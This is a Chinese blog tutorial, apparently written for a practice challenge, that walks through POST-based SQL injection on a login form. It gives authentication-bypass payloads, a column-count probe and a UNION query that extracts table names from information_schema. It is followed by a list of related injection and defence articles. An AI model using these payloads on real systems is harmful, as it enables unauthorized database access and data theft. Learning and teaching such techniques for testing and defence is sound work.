一篇文章带你搞定SQL注入里的POST注入

已于 2024-01-26 12:08:32 修改
阅读量611 收藏 12
点赞数 9
分类专栏: SQL注入攻击 文章标签: sql 数据库
于 2023-12-10 11:51:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csjjjd/article/details/134906012
版权
本文详细讲解了POST注入攻击中的闭合方式判断、字段数探测,以及针对union联合注入的示例,包括如何利用SQL盲注获取数据库信息和表结构数据。
摘要由CSDN通过智能技术生成

这里以这道题目为例子,看界面就知道这是一道典型的POST注入

这里无论怎么输入后都没有报错信息,

1.闭合方式的判断(直接上万能密码,一个个复制粘贴就好了,哪个能登录进去,哪个就是闭合方式)

1 or 1=1#             1) or 1=1#            1)) or 1=1#

1' or 1=1#            1') or 1=1#           1') or 1=1#

1" or 1=1#           1") or 1=1#          1") or 1=1#  

如果显示

那么单引号就是闭合方式

2.判断字段数

1’ or 1=1 order by 2#

不断改变数字,就可以找到

3.接下来看你做的题目的具体情况使用盲注或者时union 联合注入

举例:如果是union联合注入,就直接先爆库名,

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

接下来爆破表名,字段名,和字段内容,和GETunion联合注入方式类似,这里就不过多阐述。

只是一开始都是以1’开头罢了

补天阁
关注
  • 9
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入详解 一篇文章你快速了解!
09-16
这篇文章将深入讲解SQL注入的基本概念、危害、常见类型、检测方法以及防御策略。 首先,我们需要理解SQL是Structured Query Language(结构化查询语言)的缩写,用于管理和操作数据库系统。当用户通过网页表单或...
post注入
quan9i的博客
01-04 5402
post注入sql-lab11-18)
(手工)【sqli-labs11-12】POST注入:基本步骤、示例
07-07 1386
SQL-POST注入
SQL注入 - POST注入方法
HAKUNAMATATATTA的博客
08-30 919
SQL注入-POST注入方法教学
SQL注入---POST注入
zhoutong2323的博客
04-07 895
在Webshell文章中介绍过post提交和get提交的区别,这不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 5024
SQL注入原理-POST注入
POST注入
qq_45031509的博客
04-15 2684
POST注入 ①除了在url中体提交,也可以在网页输入上提交,如果需要与数据库连接的话就可能会存在注入,数据需要抓包才能看见。 ② 产生的地方,多半出现在登录框,查询框,等各种和数据库有交互的框数据。 ③提交方式,与参数类型(单引号,双引号的干扰) 案列(实验环境,SQlilabs 十一关) 1)抓包结果可以看出,账户,密码的提交方式,猜测可能有注入点 2)判断注入为字符型注入 3)猜测字段数为2 4)联合查询,查询数据库名与数据库用户 SELECT username, password FR
C#使用like的sql语句时防sql注入的方法
09-04
在C#编程中,SQL注入是一种常见的安全威胁,它允许恶意用户通过输入恶意构造的SQL语句来操纵数据库。在处理包含`LIKE`操作符的SQL查询时,防范SQL注入显得尤为重要,因为这类查询通常涉及用户提供的搜索关键词。本文...
php中$_GET与$_POST过滤sql注入的方法
10-25
SQL注入是一种常见的网络攻击技术,攻击者试图在SQL语句中注入恶意SQL代码,以非法控制数据库服务器。 为了防止SQL注入,开发者需要对输入数据进行适当的过滤和转义。在PHP中,开发者通常会使用内置的函数如...
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
SQL注入漏洞全接触.ppt
11-15
一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到...
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 3862
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
SQL注入POST注入和HEAD注入
qq_68233961的博客
07-10 1345
SQL注入POST注入和HEAD注入
sql注入工具的使用
qq_43511094的博客
03-09 4458
关于sql注入工具的使用前言一、超级sql注入工具1、下载地址:2、使用步骤(1).针对于get和post传递的参数进行注册小技巧:(2).针对于http头部进行的注入具体情景(3).最重要的总结二、sqlmap的使用1、前言2、使用方法3、总结 前言 针对于sql注入的练习,目前我已经使用过两种sql注入工具,分别是Sqlmap和超级sql注入,下面将各自介绍一下,我对这两个工具的感受和他们的一些具体用法 提示:以下是本篇文章正文内容,下面案例可供参考 一、超级sql注入工具 1、下载地址: 链接:h
Oracle&Postgresql注入
tell_me_404的博客
02-27 588
一、Oracle注入详解: 与Oracle数据库搭配: 脚本语言asp,aspx,jsp web服务器:tomcat 测试站点:http://www.e-hifarms.com/yellowpage/detail.jsp?id=111 1、判断注入 略 2、判断oracle数据库: id=1 and exists(select * from dual) id=1 and exist...
SQL注入——POST HEAD注入
weixin_74991270的博客
10-10 231
熟练掌握POST、HEAD注入的步骤手工注入和工具联合使用更优秀。
Oracle 注入bypass总结(艰难的心路历程)
weixin_42508548的博客
11-24 1828
文前先感谢大家的支持,上篇Oracle数据库注入总结想着后续学习一下如何进行利用,getshell的,奈何技术还太菜了,再加上项目压力大,所以就慢慢搁置了。这先出一篇bypass的,文中仅针对Oracle数据库,但是bypass手法我认为万变不离其宗,思想上是通用的,希望能够对大家有所帮助。 0x01 环境准备 一、安装Oracle数据库 1、首先下载数据库安装软件 具体可以从参考这,我是从他的百度云下载的Windows10下安装Oracle 11g_勿忘初心的博客-CSDN博客_win10安装o
SQL注入post注入
最新发布
banliyaoguai的博客
05-21 961
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
POST注入--万能密码(zkaq)
weixin_74410605的博客
07-12 1101
入门简单的sql注入中的post注入,一键学会万能密码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值